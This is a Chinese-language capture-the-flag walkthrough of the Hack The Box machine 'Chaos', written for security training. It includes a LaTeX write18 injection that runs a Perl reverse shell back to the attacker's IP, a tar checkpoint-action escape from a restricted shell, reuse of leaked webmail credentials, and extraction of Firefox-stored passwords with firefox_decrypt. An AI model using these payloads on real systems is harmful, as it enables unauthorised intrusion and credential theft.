【HTB系列】靶机Chaos的渗透测试详解 – 作者:shuteer

本文作者:是大方子(Ms08067实验室核心成员)

知识点:

1. 通过域名或者IP可能会得到网站的不同响应

2. Wpscan的扫描wordpress

3. 修改hosts来对网页邮件系统webmail进行访问

4. LaTax反弹shell

5. 通过tar来进行限制shell的绕过并修复shell的PATH

6. 用firefox_decrypt提取火狐的用户凭证缓存

介绍

1614520792_603ba1d82417f973bba6d.png!small?1614520792828

Kali: 10.10.12.87

靶机地址:10.10.10.120

先用Nmap来进行探测

root@kali:~/HTB# nmap -sV -T5 -sC 10.10.10.120
 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-08 13:18 CST
Nmap scan report for 10.10.10.120
Host is up (0.21s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE  VERSION
80/tcp    open  http     Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3     Dovecot pop3d
|_pop3-capabilities: STLS UIDL TOP SASL RESP-CODES CAPA AUTH-RESP-CODE PIPELINING
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
143/tcp   open  imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: STARTTLS ENABLE LITERAL+ OK IMAP4rev1 SASL-IR LOGINDISABLEDA0001 have post-login listed ID IDLE LOGIN-REFERRALS capabilities more Pre-login
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
993/tcp   open  ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: ENABLE LITERAL+ OK AUTH=PLAINA0001 SASL-IR capabilities have post-login listed ID IDLE LOGIN-REFERRALS IMAP4rev1 more Pre-login
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE UIDL TOP SASL(PLAIN) RESP-CODES CAPA USER PIPELINING
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
10000/tcp open  http     MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.63 seconds

靶机上运行这http服,pop3 imap 以及它们对应的ssl加密后的服务,还有一个就是监听在1000的MiniServ

我们看下80端口

80端口:

1614520897_603ba241619eff4c993dc.png!small?1614520897984

发现靶机是不允许直接使用IP进行访问的,那么我们修改下/etc/hosts文件

1614520907_603ba24bbef5fcd403bc0.png!small?1614520908370

再次访问

1614520952_603ba2782522b9e7b1e4b.png!small?1614520955917

这里我们用gobuster爆破下目录,为了结果的准确我把IP类型的地址和域名类型的地址都扫描了一遍

1614520963_603ba2839dcb9c3832990.png!small?1614520964198

1614520968_603ba2884ba16fd2ef909.png!small?1614520968896

出现的结果不同,但是都是一个问题就是网站目录可直接访问,在IP的扫描结果中我们发现了wp(wordpress),这里我们只能用IP去访问用域名去访问是没有的

1614520981_603ba2956411b90ea0277.png!small?1614520981993

1614520989_603ba29d79a337120386f.png!small?1614520991107

那么我们就用wpscan去扫描下,这里用tee命令在输出结果到终端的同时也把结果输出到文件中去。

这里扫描出了2条有用的信息,这里有个用户名字叫human

1614521006_603ba2ae40b4abc343674.png!small?1614521007430

我们尝试把human当成密码输入到刚刚页面那篇的加密文章,发现是正确的并且我们得到了webmail的帐户和密码

1614521015_603ba2b7cfc6592d67e7c.png!small?1614521016387

Creds for webmail :

username – ayush

password – jiujitsu

我们是有看到靶机是运行这邮件系统的,我们用这个尝试去登陆,我们再再hosts中增加webmai.chaos.htb的记录

1614521047_603ba2d7ab22fdb793450.png!small?1614521048218

然后输入webmail.chaos.htb进行登陆

1614521055_603ba2dfae79a08b3c876.png!small?1614521056256
然后我们在草稿箱中发现了这个

1614521072_603ba2f0a8492e652a7dc.png!small?1614521073349

一个是加密后的信息,一个是加密的脚本文件,邮件也说了“你就是密码”,所以我们可以先拿sahay当作密码进行尝试破解

以下是加密的脚本文件

def encrypt(key, filename):

chunksize = 64*1024

outputFile = “en” + filename

filesize = str(os.path.getsize(filename)).zfill(16)

IV =Random.new().read(16)

encryptor = AES.new(key, AES.MODE_CBC, IV)

with open(filename, ‘rb’) as infile:

with open(outputFile, ‘wb’) as outfile:

outfile.write(filesize.encode(‘utf-8’))

outfile.write(IV)

while True:

chunk = infile.read(chunksize)

if len(chunk) == 0:

break

elif len(chunk) % 16 != 0:

chunk += b’ ‘ * (16 – (len(chunk) % 16))

outfile.write(encryptor.encrypt(chunk))

def getKey(password):

hasher = SHA256.new(password.encode(‘utf-8’))

return hasher.digest()

根据加密脚本写出对应的解密脚本

from Crypto.Hash import SHA256

from Crypto.Cipher import AES

import Crypto.Cipher.AES

from binascii import hexlify, unhexlify

def encrypt(key, filename):

chunksize = 64*1024

outputFile = “en” + filename

filesize = str(os.path.getsize(filename)).zfill(16)

IV =Random.new().read(16)

encryptor = AES.new(key, AES.MODE_CBC, IV)

with open(filename, ‘rb’) as infile:

with open(outputFile, ‘wb’) as outfile:

outfile.write(filesize.encode(‘utf-8’))

outfile.write(IV)

while True:

chunk = infile.read(chunksize)

if len(chunk) == 0:

break

elif len(chunk) % 16 != 0:

chunk += b’ ‘ * (16 – (len(chunk) % 16))

outfile.write(encryptor.encrypt(chunk))

def getKey(password):

hasher = SHA256.new(password.encode(‘utf-8’))

return hasher.digest()

if __name__==”__main__”:

chunksize = 64*1024

mkey = getKey(“sahay”)

mIV = (b”0000000000000234″)

decipher = AES.new(mkey,AES.MODE_CBC,mIV)

with open(“enim_msg.txt”, ‘rb’) as infile:

chunk = infile.read(chunksize)

plaintext = decipher.decrypt(chunk)

print plaintext

执行解密脚本得到Base64加密后的结果:

1614521204_603ba3746a8382bde03a7.png!small?1614521205201

这里前面的16为IV向量要去除,然后通过base64解码

echo "SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK" | base64 -d

1614521224_603ba388c196211521d18.png!small?1614521225387

得到一个连接http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

1614521242_603ba39ac6e8066f88eb4.png!small?1614521243559

LaTax常用于文档排版的,具体可以百度下!

输入文本并选择好模板后可以生成PDF,可以在

http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/pdf/

看到生成好的PDF!

关于LaTax的攻击可以参考这篇文章:

https://0day.work/hacking-with-latex/

我们使用下面的exp反弹shell

\immediate\write18{perl -e 'use Socket;$i="你的IP地址";$p=端口;<br>
<br>
socket(S,PF\_INET,SOCK\_STREAM,getprotobyname("tcp"));<br>
<br>
if(connect(S,sockaddr\_in($p,inet\_aton($i)))){open(STDIN,">&S");<br>
<br>
open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'} |

监听制定端口并执行EXP

1614521276_603ba3bc37746b99c43c1.png!small?1614521276798

1614521284_603ba3c413bf295162413.png!small?1614521284676

在得到shell后,我们用python建立一个稳定的shell

1614521306_603ba3da45ba9a05a5f7f.png!small?1614521306812

切换到Home目录发现这2个目录都没有权限1614521313_603ba3e157b3d15a8ef7b.png!small?1614521313895

我们试下之前的mail的帐户密码,看看能不能切换到ayush

username – ayush

password – jiujitsu

切换成功但是,ayush处于受限的shell中

1614521325_603ba3edd10c773827c0b.png!small?1614521326578

1614521332_603ba3f4c331beeb5bbe5.png!small?1614521333282

这里我们看到我们的PATH是ayush/.app,我们只能用这3个命令

对于限制shell的绕过,可以参考这个:

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

那么我们用tar 进行绕过!

这里我们先切换回www-data,因为www-data的shell是正常的,然我们切换到/tmp目录下并创建rick并进行压缩

1614521353_603ba4096a5711fa14a60.png!small?1614521354244

1614521358_603ba40e23dcbbfd1f742.png!small?1614521358679

然后在切换到ayush

1614521364_603ba414edf6b785ae1b6.png!small?1614521365846

然后先进行绕过!

| tar cf /dev/null rick.tar --checkpoint=1 --checkpoint-action=exec=/bin/bash |

再修复下PATH

| export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin |

1614521401_603ba439d7490db55e519.png!small?1614521402580然后得到user flag

1614521412_603ba444dcc078f928c84.png!small?1614521413392

然后我们发现用户的目录下又.mozilla的文件里面有个firefox,用ls-la查看大小发现都大于firefox的默认大小,怀疑里面是有用户的凭证的

使用firefox_decrypt提取缓存凭据,项目地址:
https://github.com/unode/firefox_decrypt

然后把项目下载到靶机中去!

1614521421_603ba44d9421b4756bb04.png!small?1614521422118

然后对提取脚本加执行权限,并进行解密,提示需要输入主密钥我们同样输入jiujitsu,发现密码也是正确的!

1614521431_603ba4571d209f6990447.png!small?1614521431909

切换到root得到root flag!!

image.png

MS08067实验室官网:www.ms08067.com

公众号:” Ms08067安全实验室”

Ms08067安全实验室目前开放知识星球: WEB安全攻防,内网安全攻防,Python安全攻防,KALI Linux安全攻防,二进制逆向入门

最后期待各位小伙伴的加入!

来源:freebuf.com 2021-02-28 22:18:46 by: shuteer

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论